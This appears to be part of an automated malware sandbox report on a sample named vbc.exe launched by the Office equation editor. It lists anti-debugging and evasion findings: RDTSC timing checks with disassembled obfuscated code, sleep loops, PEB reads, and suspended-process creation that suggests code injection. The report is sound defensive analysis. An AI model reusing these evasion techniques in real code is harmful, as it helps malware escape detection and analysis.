Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000459872 second address: 0000000000459872 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 1ECE1B4Fh 0x00000007 xor eax, 1DCBF7C6h 0x0000000c xor eax, 314CA14Ah 0x00000011 sub eax, 32494DC2h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FD8B8FCB1F8h 0x0000001e lfence 0x00000021 mov edx, 823F9AFEh 0x00000026 add edx, 01EEC23Dh 0x0000002c xor edx, 2B36126Dh 0x00000032 xor edx, D0E64F42h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d jmp 00007FD8B8FCB236h 0x0000003f cmp bh, ch 0x00000041 ret 0x00000042 sub edx, esi 0x00000044 ret 0x00000045 test ax, bx 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 test eax, edx 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007FD8B8FCB1D7h 0x0000005b call 00007FD8B8FCB28Bh 0x00000060 call 00007FD8B8FCB219h 0x00000065 lfence 0x00000068 mov edx, 823F9AFEh 0x0000006d add edx, 01EEC23Dh 0x00000073 xor edx, 2B36126Dh 0x00000079 xor edx, D0E64F42h 0x0000007f mov edx, dword ptr [edx] 0x00000081 lfence 0x00000084 jmp 00007FD8B8FCB236h 0x00000086 cmp bh, ch 0x00000088 ret 0x00000089 mov esi, edx 0x0000008b pushad 0x0000008c rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2560 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2560 Thread sleep time: -60000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045986A rdtsc 6_2_0045986A

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045986A rdtsc 6_2_0045986A
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00458C21 mov eax, dword ptr fs:[00000030h] 6_2_00458C21
Source: C:\Users\Public\vbc.exe Code function: 6_2_004544FC mov eax, dword ptr fs:[00000030h] 6_2_004544FC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454515 mov eax, dword ptr fs:[00000030h] 6_2_00454515
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453D1D mov eax, dword ptr fs:[00000030h] 6_2_00453D1D
Source: C:\Users\Public\vbc.exe Code function: 6_2_004566CF mov eax, dword ptr fs:[00000030h] 6_2_004566CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045939A mov eax, dword ptr fs:[00000030h] 6_2_0045939A

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs